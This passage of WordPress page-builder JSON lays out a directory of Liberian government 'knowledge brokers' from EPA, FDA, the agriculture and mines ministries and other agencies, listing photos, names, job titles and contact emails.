questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{